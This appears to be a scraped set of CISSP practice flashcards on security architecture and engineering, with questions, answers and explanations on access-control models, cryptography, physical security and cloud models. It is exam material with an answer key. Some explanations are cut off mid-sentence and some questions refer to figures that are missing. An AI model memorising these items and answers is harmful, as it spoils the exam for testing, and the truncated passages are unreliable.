CISSP Practice Test Chapter 3 Security Architecture and Engineering (Sybex) Flashcards
Matthew is the security administrator for a consulting firm and must enforce access controls that restrict users’ access based upon their previous activity. For example, once a consultant accesses data belonging to Acme Cola, a consulting client, they may no longer access data belonging to any of Acme’s competitors. What security model best fits Matthew’s needs?
A. Clark-Wilson
B. Biba
C. Bell-LaPadula
D. Brewer-Nash
D. Brewer-Nash
Explanation:
The Brewer-Nash model allows access controls to change dynamically based upon a user’s actions. It is often used in environments like Matthew’s to implement a “Chinese wall” between data belonging to different clients.
Referring to the figure shown here, what is the earliest stage of a fire where it is possible to use detection technology to identify it?
A. Incipient
B. Smoke
C. Flame
D. Heat
A. Incipient
Explanation:
Fires may be detected as early as the incipient stage. During this stage, air ionization takes place, and specialized incipient fire detection systems can identify these changes to provide early warning of a fire.
Ralph is designing a physical security infrastructure for a new computing facility that will remain largely unstaffed. He plans to implement motion detectors in the facility but would also like to include a secondary verification control for physical presence. Which one of the following would best meet his needs?
A. CCTV
B. IPS
C. Turnstiles
D. Faraday cages
A. CCTV
Explanation:
A. Closed-circuit television (CCTV) systems act as a secondary verification mechanism for physical presence because they allow security officials to view the interior of the facility when a motion alarm sounds to determine the current occupants and their activities.
Harry would like to retrieve a lost encryption key from a database that uses m of n control, with m = 4 and n = 8. What is the minimum number of escrow agents required to retrieve the key?
A. 2
B. 4
C. 8
D. 12
B. 4
Explanation:
In an m of n control system, at least m of n possible escrow agents must collaborate to retrieve an encryption key from the escrow database.
Fran’s company is considering purchasing a web-based email service from a vendor and eliminating its own email server environment as a cost-saving measure. What type of cloud computing environment is Fran’s company considering?
A. SaaS
B. IaaS
C. CaaS
D. PaaS
A. SaaS
Explanation:
A. This is an example of a vendor offering a fully functional application as a web-based service. Therefore, it fits under the definition of software as a service (SaaS). In infrastructure as a service (IaaS), compute as a service (CaaS), and platform as a service (PaaS) approaches, the customer provides their own software. In this example, the vendor is providing the email software, so none of those choices is appropriate.
Bob is a security administrator with the U.S. federal government and wants to choose a digital signature approach that is an approved part of the federal Digital Signature Standard under FIPS 186-4. Which one of the following encryption algorithms is not an acceptable choice for use in digital signatures?
A. DSA
B. HAVAL
C. RSA
D. ECDSA
B. HAVAL
Explanation:
The Digital Signature Standard approves three encryption algorithms for use in digital signatures: the Digital Signature Algorithm (DSA); the Rivest, Shamir, Adleman (RSA) algorithm; and the Elliptic Curve DSA (ECDSA) algorithm. HAVAL is a hash function, not an encryption algorithm. While hash functions are used as part of the digital signature process, they do not provide encryption.
Harry would like to access a document owned by Sally and stored on a file server. Applying the subject/object model to this scenario, who or what is the subject of the resource request?
A. Harry
B. Sally
C. Server
D. Document
A. Harry
Explanation:
In the subject/object model of access control, the user or process making the request for a resource is the subject of that request. In this example, Harry is requesting resource access and is, therefore, the subject.
Michael is responsible for forensic investigations and is investigating a medium-severity security incident that involved the defacement of a corporate website. The web server in question ran on a virtualization platform, and the marketing team would like to get the website up and running as quickly as possible. What would be the most reasonable next step for Michael to take?
A. Keep the website offline until the investigation is complete.
B. Take the virtualization platform offline as evidence.
C. Take a snapshot of the compromised system and use that for the investigation.
D. Ignore the incident and focus on quickly restoring the website.
C. Take a snapshot of the compromised system and use that for the investigation.
Explanation:
Michael should conduct his investigation, but there is a pressing business need to bring the website back online. The most reasonable course of action would be to take a snapshot of the compromised system and use the snapshot for the investigation, restoring the website to operation as quickly as possible while using the results of the investigation to improve the security of the site.
Helen is a software engineer and is developing code that she would like to restrict to running within an isolated sandbox for security purposes. What software development technique is Helen using?
A. Bounds
B. Input validation
C. Confinement
D. TCB
C. Confinement
Explanation:
C. Using a sandbox is an example of confinement, where the system restricts the access of a particular process to limit its ability to affect other processes running on the same system.
What concept describes the degree of confidence that an organization has that its controls satisfy security requirements?
A. Trust
B. Credentialing
C. Verification
D. Assurance
D. Assurance
Explanation:
Assurance is the degree of confidence that an organization has that its security controls are correctly implemented. It must be continually monitored and reverified.
What type of security vulnerability are developers most likely to introduce into code when they seek to facilitate their own access, for testing purposes, to software they developed?
A, Maintenance hook
B. Cross-site scripting
C. SQL injection
D. Buffer overflow
A, Maintenance hook
Explanation:
Maintenance hooks, otherwise known as backdoors, provide developers with easy access to a system, bypassing normal security controls. If not removed prior to finalizing code, they pose a significant security vulnerability if an att
In the figure shown here, Sally is blocked from reading the file due to the Biba integrity model. Sally has a Secret security clearance, and the file has a Confidential classification. What principle of the Biba model is being enforced?
A. Simple Security Property
B. Simple Integrity Property
C. *-Security Property
D. *-Integrity Property
B. Simple Integrity Property
Explanation:
The Simple Integrity Property states that an individual may not read a file classified at a lower security level than the individual’s security clearance.
Tom is responsible for maintaining the security of systems used to control industrial processes located within a power plant. What term is used to describe these systems?
A. POWER
B. SCADA
C. HAVAL
D. COBOL
B. SCADA
Explanation:
Supervisory control and data acquisition (SCADA) systems are used to control and gather data from industrial processes. They are commonly found in power plants and other industrial environments.
Sonia recently removed an encrypted hard drive from a laptop and moved it to a new device because of a hardware failure. She is having difficulty accessing encrypted content on the drive despite the fact that she knows the user’s password. What hardware security feature is likely causing this problem?
A. TCB
B. TPM
C. NIACAP
D. RSA
B. TPM
Explanation:
The Trusted Platform Module (TPM) is a hardware security technique that stores an encryption key on a chip on the motherboard and prevents someone from accessing an encrypted drive by installing it in another computer.
Chris wants to verify that a software package that he downloaded matches the original version. What hashing tool should he use if he believes that technically sophisticated attackers may have replaced the software package with a version containing a backdoor?
A. MD5
B. 3DES
C. SHA1
D. SHA 256
D. SHA 256
Explanation:
Intentional collisions have been created with MD5, and a real-world collision attack against SHA 1was announced in early 2017. 3DES is not a hashing tool, leaving SHA 256 (sometimes called SHA 2) as the only real choice that Chris has in this list. C. In an asymmetric
For questions 16–19, please refer to the following scenario:
Alice and Bob would like to use an asymmetric cryptosystem to communicate with each other. They are located in different parts of the country but have exchanged encryption keys by using digital certificates signed by a mutually trusted certificate authority.
If Alice wants to send Bob a message that is encrypted for confidentiality, what key does she use to encrypt the message?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
C. Bob’s public key
Explanation:
In an asymmetric cryptosystem, the sender of a message encrypts the message using the recipient’s public key. The recipient may then decrypt that message using their own private key, which only they should possess.
When Bob receives the encrypted message from Alice, what key does he use to decrypt the message’s plaintext content?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
D. Bob’s private key
Explanation:
When Bob receives the message, he uses his own private key to decrypt it. Since he is the only one with his private key, he is the only one who should be able to decrypt it, thus preserving confidentiality.
Which one of the following keys would Bob not possess in this scenario?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
B. Alice’s private key
Explanation:
Each user retains their private key as secret information. In this scenario, Bob would only have access to his own private key and would not have access to the private key of Alice or any other user.
Alice would also like to digitally sign the message that she sends to Bob. What key should she use to create the digital signature?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
B. Alice’s private key
Explanation:
Alice creates the digital signature using her own private key. Then Bob, or any other user, can verify the digital signature using Alice’s public key.
What name is given to the random value added to a password in an attempt to defeat rainbow table attacks?
A. Hash
B. Salt
C. Extender
D. Rebar
B. Salt
Explanation:
The salt is a random value added to a password before it is hashed by the operating system. The salt is then stored in a password file with the hashed password. This increases the complexity of cryptanalytic attacks by negating the usefulness of attacks that use precomputed hash values, such as rainbow tables.
Which one of the following is not an attribute of a hashing algorithm?
A. They require a cryptographic key.
B. They are irreversible.
C. It is very difficult to find two messages with the same hash value.
D. They take vaiable-length input.
A. They require a cryptographic key.
Explanation:
Hash functions do not include any element of secrecy and, therefore, do not require a cryptographic key.
What type of fire suppression system fills with water after a valve opens when the initial stages of a fire are detected and then requires a sprinkler head heat activation before dispensing water?
A. Wet pipe
B. Dry pipe
C. Deluge
D. Preaction
D. Preaction
Explanation:
A preaction fire suppression system activates in two steps. The pipes fill with water once the early signs of a fire are detected. The system does not dispense water until heat sensors on the sprinkler heads trigger the second phase.
Susan would like to configure IPsec in a manner that provides confidentiality for the content of packets. What component of IPsec provides this capability?
A. AH
B. ESP
C. IKE
D. ISAKMP
B. ESP
Explanation:
The Encapsulating Security Payload (ESP) protocol provides confidentiality and integrity for packet contents. It encrypts packet payloads and provides limited authentication and protection against replay attacks.
Which one of the following cryptographic goals protects against the risks posed when a device is lost or stolen?
A. Nonrepudiation
B. Authentication
C. Integrity
D. Confidentiality
D. Confidentiality
Explanation:
The greatest risk when a device is lost or stolen is that sensitive data contained on the device will fall into the wrong hands. Confidentiality protects against this risk. Nonrepudiation is when the recipient of a message can prove the originator’s identity to a third party. Authentication is a means of proving one’s identity. Integrity demonstrates that information has not been modified since transmission.
Joanna wants to review the status of the industrial control systems her organization uses for building control. What type of systems should she inquire about access to?
A. SCADA
B. DSS
C. BAS
D. ICS-CSS
A. SCADA
Explanation:
Supervisory Control and Data Acquisition systems, or SCADA systems, provide a graphical interface to monitor industrial control systems (ICS). Joanna should ask about access to her organization’s SCADA systems.
In the figure shown here, Harry’s request to write to the data file is blocked. Harry has a Secret security clearance, and the data file has a Confidential classification. What principle of the Bell-LaPadula model blocked this request?
A. Simple Security Property
B. Simple Integrity Property
C. *-Security Property
D. Discretionary Security Property
C. *-Security Property
Explanation:
The *-Security Property states that an individual may not write to a file at a lower classification level than that of the individual. This is also known as the confinement property.
Florian and Tobias would like to begin communicating using a symmetric cryptosystem, but they have no prearranged secret and are not able to meet in person to exchange keys. What algorithm can they use to securely exchange the secret key?
A. IDEA
B. Diffie-Hellman
C. RSA
D. MD5
B. Diffie-Hellman
Explanation:
The Diffie-Hellman algorithm allows for the secure exchange of symmetric encryption keys over a public network. IDEA and RSA are encryption algorithms. MD5 is a hashing function.
Carl’s organization recently underwent a user access review. At the conclusion of the review, the auditors noted several cases of privilege creep. What security principle was violated?
A. Fail securely
B. Keep it simple
C. Trust but verify
D. Least privilege
D. Least privilege
Explanation:
The principle of least privilege says that an employee should have only the minimum necessary privileges required to perform their jobs. Privilege creep indicates that an employee has accumulated permissions that they no longer require, indicating a violation of the least privilege principle. The trust but verify principle says that organizations should use auditing to ensure that control objectives are met. The fail securely principle says that security controls should default to a secure state in the event of a control failure. The keep it simple principle says that security controls and other technologies should remain as simple as possible while still completing their objectives.
Matt’s organization recently adopted a zero-trust network architecture. Under this approach, which one of the following criteria would be LEAST appropriate to use when granting a subject access to resources?
A. Password
B. Two-factor authentication
C. IP address
D. Biometric scan
C. IP address
Explanation:
In a zero-trust network architecture, access control decisions should never be made based upon a system’s location on the network. Therefore, an IP address should never be used and would be the least appropriate of these options. While the other options have differing levels of security (two-factor authentication is clearly stronger than a password or biometrics alone), they do not violate the principles of a zero-trust network architecture.
Colin is the chief privacy officer for a non-profit organization and is assisting with the team’s transition to a Privacy by Design approach. Under this approach, which is not one of the Privacy by Design principles that the team should embrace?
A. Proactive, not reactive
B. Privacy as the default setting
C. End-to-end security
D. Defense in depth
D. Defense in depth
Explanation:
While defense in depth is a strong security principle, it is not a component of Privacy by Design. The following are the seven principles of the Privacy by Design model:
1. Proactive, not reactive; preventive, not remedial
2. Privacy as the default setting
3. Privacy embedded into design
4. Full functionality—positive-sum, not zero-sum
5. End-to-end security—full lifecycle protection
6. Visibility and transparency—keep it open
7. Respect for user privacy—keep it user-centric
What cryptographic principle stands behind the idea that cryptographic algorithms should be open to public inspection?
A. Security through obscurity
B. Kerckhoffs’ principle
C. Defense in depth
D. Heisenburg principle
B. Kerckhoffs’ principle
Explanation:
Kerckhoffs’ principle says that a cryptographic system should be secure even if everything about the system, except the key, is public knowledge.
Ryan is developing a physical access plan for his organization’s data center and wants to implement the security control indicated by the arrow in this diagram. What is the name of this control?
A. Mantrap
B. Turnstile
C. Intrusion prevention system
D. Portal
A. Mantrap
Explanation:
Mantraps use two sets of doors to control access to a facility. This may be used to prevent piggybacking by monitoring use of the mantrap to allow only a single individual to enter a facility at a time. They may also be used to allow manual inspection of individuals or perform other security screening. Mantraps are also commonly known as access control vestibules.
Which one of the following does not describe a standard physical security requirement for wiring closets?
A. Place only in areas monitored by security guards.
B. Do not store flammable items in the closet.
C. Use sensors on doors to log entries.
D. Perform regular inspections of the closet.
A. Place only in areas monitored by security guards.
Explanation:
While it would be ideal to have wiring closets in a location where they are monitored by security staff, this is not feasible in most environments. Wiring closets must be distributed geographically in multiple locations across each building used by an organization.
In the figure shown here, Sally is blocked from writing to the data file by the Biba integrity model. Sally has a Secret security clearance, and the file is classified Top Secret. What principle is preventing her from writing to the file?
A. Simple Security Property
B. Simple Integrity Property
C. *-Security Property
D. *-Integrity Property
D. *-Integrity Property
Explanation:
The *-Integrity Property states that a subject cannot modify an object at a higher integrity level than that possessed by the subject.
Lana recently implemented a new process in her organization where managers who are responsible for granting users access to a system are not permitted to participate in access reviews. What principle is she enforcing?
A. Two-person control
B. Least privilege
C. Privilege creep
D. Separation of duties
D. Separation of duties
Explanation:
The separation of duties principle says that no employee should have permission to perform two tasks that, when combined, would pose a security risk. In this situation, an employee auditing their own work would create a conflict of interest, so Lana has implemented a separation of duties. Two-person control is closely related, but it requires that two different employees approve an action. If she required that two managers approve new accounts, that would be an example of two-person control.
Which of the following statements about system development are correct? (Select all that apply.)
A. Systems should be designed to operate in a secure manner if the user performs no other configuration.
B. Systems should be designed to fall back to a secure state if they experience an error.
C. Systems should be designed to incorporate security as a design feature.
D. Systems should be designed in a manner that keeps their functionality as simple as possible.
A. Systems should be designed to operate in a secure manner if the user performs no other configuration.
B. Systems should be designed to fall back to a secure state if they experience an error.
C. Systems should be designed to incorporate security as a design feature.
D. Systems should be designed in a manner that keeps their functionality as simple as possible.
Explanation:
All of these statements are correct. The idea that systems should be designed to operate in a secure manner if the user performs no other configuration is the secure defaults principle. The idea that systems should be designed to fall back to a secure state if they experience an error is the fail securely principle. The idea that systems should be designed to incorporate security as a design feature is the security by design principle. The idea that systems should be designed in a manner that keeps their functionality as simple
Alan is reviewing a system that has been assigned the EAL1 evaluation assurance level under the Common Criteria. What is the degree of assurance that he may have about the system?
A. It has been functionally tested.
B. It has been structurally tested.
C. It has been formally verified, designed, and tested.
D. It has been methodically designed, tested, and reviewed.
A. It has been functionally tested.
Explanation:
EAL1 assurance applies when the system in question has been functionally tested. It is the lowest level of assurance under the Common Criteria.
Jake works for a research organization that is seeking to deploy a grid computing system that will perform cycle scavenging on user workstations to conduct research tasks that require high-performance computing. What is the most significant risk associated with this operation?
A. Data confidentiality
B. Isolation breach
C. Data integrity
D. Data availability
B. Isolation breach
Explanation:
The system can be designed in a manner that protects the confidentiality, integrity, and availability of data. The research workstations included in the grid are from internal users, minimizing the risk of distributing the data. However, an isolation breach in the distributed computing client could be catastrophic, allowing someone who compromises the controller to assume control of every device in the organization.
Eimear’s software development team uses an approach that creates many discrete software objects and then binds them together using APIs. What term best describes this architecture?
A. Microservices
B. Function-as-a-service
C. Containerization
D. Virtualization
A. Microservices
Explanation:
This is an example of a microservices architecture. Each of the component microservices performs a discrete task and then communicates with other microservices using APIs. This might be accomplished using FaaS cloud computing, containerization, and/or virtualization, but there is no indication whether those services are being used in the scenario.
Adam recently configured permissions on an NTFS filesystem to describe the access that different users may have to a file by listing each user individually. What did Adam create?
A. An access control list
B. An access control entry
C. Role-based access control
D. Mandatory access control
A. An access control list
Explanation:
Adam created a list of individual users who may access the file. This is an access control list, which consists of multiple access control entries. It includes the names of users, so it is not role-based, and Adam was able to modify the list, so it is not mandatory access control.